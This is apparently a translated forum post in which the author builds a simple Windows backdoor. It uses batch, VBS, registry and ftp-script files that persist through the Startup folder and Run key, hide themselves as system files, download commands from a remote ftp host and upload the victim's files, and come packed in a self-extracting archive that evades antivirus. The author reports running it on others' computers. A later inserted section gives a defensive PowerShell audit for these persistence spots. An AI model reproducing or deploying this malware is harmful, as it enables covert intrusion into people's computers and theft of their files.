Everyone has at some point wanted to look through other people's files without their knowledge, but many are put off by the idea of downloading the various generators out there, since nobody knows what their creators have stuffed into them, and antivirus products flag them immediately. At some point I wanted to make something of my own. I decided to start with something simple and useful, the command line, which later turned out to be indispensable.
Having learned how to download over ftp, I decided to create a simple virus that downloads files from someone else's computer:
@echo Off
@ftp -s:ftp_com.ini -i ******.host56.com
Rem I chose the host 000webhost.com because it lets you edit any text file over the Internet.
The ftp_com.ini file is the file that stores the login and password first, followed by the ftp commands.
Then I created a vbs file to hide the command-line window:
Set oShell = WScript.CreateObject("WScript.Shell")
oShell.Run " ", 0, False
Then (since the computer was running Vista) I copied this vbs file into the Startup folder. For at least some concealment I made it a hidden system file (where I intended to use it, even hidden files were not displayed), by adding these two lines to one batch file (I called it WinSys.cmd):
copy vbsmach.vbs "%userprofile%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup"
attrib +S +H "%userprofile%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vbsmach.vbs"
vbsmach.vbs is the vbs script itself.
But when I tested it on another computer running XP, I found that it did not work, so for reliability I also put the entry into a registry file. It came out like this:
Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"System32"="\"%%userprofile%%\\AppData\\Roaming\\Microsoft\\Windows\\WinSys.cmd""
And in the body of the batch file we write reg import followed by the name of the registry file (.reg).
Then I ran the batch file on my computer and noticed that it sometimes hangs, so I decided to add a delay, and did it with another cmd file, WinHelp.cmd, containing:
ping -n 10 127.0.0.1
cls
WinSys.cmd
Now we need to add at least some way to manage it. To do this, add commands to the ftp_com.ini file to download and upload files:
ftp
ftp
get ftp_com.ini
get WinHelp.cmd
put tree.txt
bye
I decided not to modify the WinSys.cmd file, although that can be done without problems. Now upload all the files to the ftp server and the virus is ready. But I added a couple of lines to WinSys.cmd for stealth:
copy vbsmach.vbs "%userprofile%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup"
Copy Winsys.cmd "%userprofile%\AppData\Roaming\Microsoft\Windows"
Copy WinHelp.cmd "%userprofile%\AppData\Roaming\Microsoft\Windows"
Copy ftp_com.ini "%userprofile%\AppData\Roaming\Microsoft\Windows"
attrib +S +H "%userprofile%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vbsmach.vbs"
attrib +S +H "%userprofile%\AppData\Roaming\Microsoft\Windows\Winsys.cmd"
attrib +S +H "%userprofile%\AppData\Roaming\Microsoft\Windows\WinHelp.cmd"
attrib +S +H "%userprofile%\AppData\Roaming\Microsoft\Windows\ftp_com.ini"
%userprofile%\AppData\Roaming\Microsoft\Windows\WinHelp.cmd
The last line is needed so that it runs continuously.
So it is ready, but we are not going to hand someone that many files, so all of this should be packed either into an exe or into a single bat file. I chose the first option, since many people are very wary of all these bat/cmd files, and made it with WinRAR, configuring it in advance to run vbsmach.vbs after extraction. After testing this I realized that it leaves a lot of traces, so I decided to change a lot in the virus. This is what WinSys.cmd became:
@ftp -s:ftp_com.ini -i ****.host56.com
cls
reg import regedit.reg
copy vbsmach.vbs "%userprofile%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup"
Copy Winsys.cmd "%userprofile%\AppData\Roaming\Microsoft\Windows"
Copy WinHelp.cmd "%userprofile%\AppData\Roaming\Microsoft\Windows"
Copy ftp_com.ini "%userprofile%\AppData\Roaming\Microsoft\Windows"
del /q ftp_com.ini
del /q WinHelp.cmd
del /q vbsmach.vbs
attrib +S +H "%userprofile%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vbsmach.vbs"
attrib +S +H "%userprofile%\AppData\Roaming\Microsoft\Windows\Winsys.cmd"
attrib +S +H "%userprofile%\AppData\Roaming\Microsoft\Windows\WinHelp.cmd"
attrib +S +H "%userprofile%\AppData\Roaming\Microsoft\Windows\ftp_com.ini"
%userprofile%\AppData\Roaming\Microsoft\Windows\WinHelp.cmd
When creating the archive I entered the extraction path %userprofile%\downloads and added this line to the WinHelp.cmd file:
del /q %userprofile%\WinSys.cmd
This is what the virus looked like once it was finished:
WinSys.cmd file
@ftp -s:ftp_com.ini -i ****.host56.com
cls
reg import regedit.reg
copy vbsmach.vbs "%userprofile%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup"
Copy Winsys.cmd "%userprofile%\AppData\Roaming\Microsoft\Windows"
Copy WinHelp.cmd "%userprofile%\AppData\Roaming\Microsoft\Windows"
Copy ftp_com.ini "%userprofile%\AppData\Roaming\Microsoft\Windows"
del /q ftp_com.ini
del /q WinHelp.cmd
del /q vbsmach.vbs
attrib +S +H "%userprofile%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vbsmach.vbs"
attrib +S +H "%userprofile%\AppData\Roaming\Microsoft\Windows\Winsys.cmd"
attrib +S +H "%userprofile%\AppData\Roaming\Microsoft\Windows\WinHelp.cmd"
attrib +S +H "%userprofile%\AppData\Roaming\Microsoft\Windows\ftp_com.ini"
%userprofile%\AppData\Roaming\Microsoft\Windows\WinHelp.cmd
The WinHelp.cmd file, which is needed not only for the delay; it is best to put the functions that launch the files into it:
del /q %userprofile%\WinSys.cmd
del /q %userprofile%\regedit.reg
ping -n 10 127.0.0.1
cls
WinSys.cmd
Registry file, regedit.reg
Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"System32"="\"%%userprofile%%\\AppData\\Roaming\\Microsoft\\Windows\\WinHelp.cmd""
ftp_com.ini file
login from ftp server
password
get ftp_com.ini
get WinHelp.cmd
bye
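A defender's counterpart to the listings above, added here as an example (it is not part of the original post): a PowerShell audit that checks the persistence spots this dropper uses (the Run keys and the Startup folders, where it places hidden+system .cmd/.vbs files under AppData) and looks for ftp.exe being driven by a -s: script file, which is the behaviour no antivirus flagged. It assumes an elevated PowerShell session on the host being checked and, for the last check, process-creation auditing with command-line logging (Security event 4688); the seven-day lookback and the list of script extensions are my choices, not something the post specifies.

```powershell
# Added defensive example (not from the original post): audit the persistence
# locations this dropper uses and look for ftp.exe being driven by a script file.
# Assumptions: elevated PowerShell on the host being checked; process auditing
# with command-line logging (event 4688) enabled for the last check.

$findings = @()
$scriptExt = '(?i)\.(cmd|bat|vbs|js|ps1)'   # extensions the post's dropper relies on
$metaProps = 'PSPath', 'PSParentPath', 'PSChildName', 'PSDrive', 'PSProvider'

# 1. Run keys: flag values that point into a user profile or launch a script.
$runKeys = @(
  'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run',
  'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run'
)
foreach ($key in $runKeys) {
  if (-not (Test-Path $key)) { continue }
  $props = Get-ItemProperty -Path $key
  foreach ($p in $props.PSObject.Properties) {
    if ($p.Name -in $metaProps) { continue }   # skip provider metadata, keep real values
    $cmd = [Environment]::ExpandEnvironmentVariables([string]$p.Value)
    $inProfile = $cmd -match '(?i)\\AppData\\'
    $isScript  = $cmd -match ($scriptExt + '(\s|"|$)')
    if ($inProfile -or $isScript) {
      $findings += [pscustomobject]@{ Source = "$key\$($p.Name)"; Detail = $cmd }
    }
  }
}

# 2. Startup folders: files carrying Hidden+System together (attrib +S +H), or scripts.
$startupDirs = @(
  [Environment]::GetFolderPath('Startup'),
  [Environment]::GetFolderPath('CommonStartup')
)
foreach ($dir in $startupDirs) {
  if (-not (Test-Path $dir)) { continue }
  foreach ($f in (Get-ChildItem -Path $dir -Force -File)) {
    $attrs = $f.Attributes
    $hidden = ($attrs -band [IO.FileAttributes]::Hidden) -ne 0
    $system = ($attrs -band [IO.FileAttributes]::System) -ne 0
    $isScript = $f.Extension -match ($scriptExt + '$')
    if (($hidden -and $system) -or $isScript) {
      $findings += [pscustomobject]@{ Source = $f.FullName; Detail = "Attributes=$attrs" }
    }
  }
}

# 3. Recent process creations of ftp.exe with a -s: script argument. This needs
# command-line auditing; if the events are unavailable the check is skipped.
try {
  $filter = @{ LogName = 'Security'; Id = 4688; StartTime = (Get-Date).AddDays(-7) }
  $events = Get-WinEvent -FilterHashtable $filter -ErrorAction Stop
  foreach ($e in $events) {
    if ($e.Message -match '(?i)ftp\.exe' -and $e.Message -match '(?i)-s:') {
      $findings += [pscustomobject]@{
        Source = "Security/4688 @ $($e.TimeCreated)"
        Detail = 'ftp.exe launched with a -s: script file'
      }
    }
  }
} catch {
  Write-Verbose 'No 4688 events available (auditing not enabled or insufficient rights).'
}

if ($findings.Count -eq 0) {
  'No suspicious persistence entries or scripted ftp.exe launches found.'
} else {
  $findings | Format-Table -AutoSize -Wrap
}
```

Each finding names where it came from, so a reviewer can go straight to the Run value, Startup file or event in question; the Hidden+System combination and a Run entry pointing into AppData are both legitimate in rare cases, so the output is a list to triage rather than a verdict.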
How to use it is, I think, clear. After creating the archive I decided to check it on VirusTotal:
www.virustotal.com/file/da428b5c22d4730370ad2018e70eb5fed3dc2b5c7afe9e4fe93a739772aa18e1/analysis/1359883653
And not a single antivirus suspected anything. This is my first virus, which I decided to run on a few computers, naturally with different ftp servers, but after a while I deleted it, since there was nothing interesting on them.
Detecting it is certainly not hard, and its functionality is only enough to scare someone (although you could download a lot of nasty things onto that computer, but that is a different conversation), but what struck me is that no heuristic found anything suspicious in it. Yet it can be used to view other people's files, download and run various exe files, and change the registry and other settings; for a simple piece of malware that is actually enough, and you could also create a hidden administrator account and connect over Telnet. Although for those purposes it could be made simpler.
After that I turned my attention to firewalls as one of the best defenses against all kinds of mischief, while an antivirus is only needed to protect against blockers, and nothing more.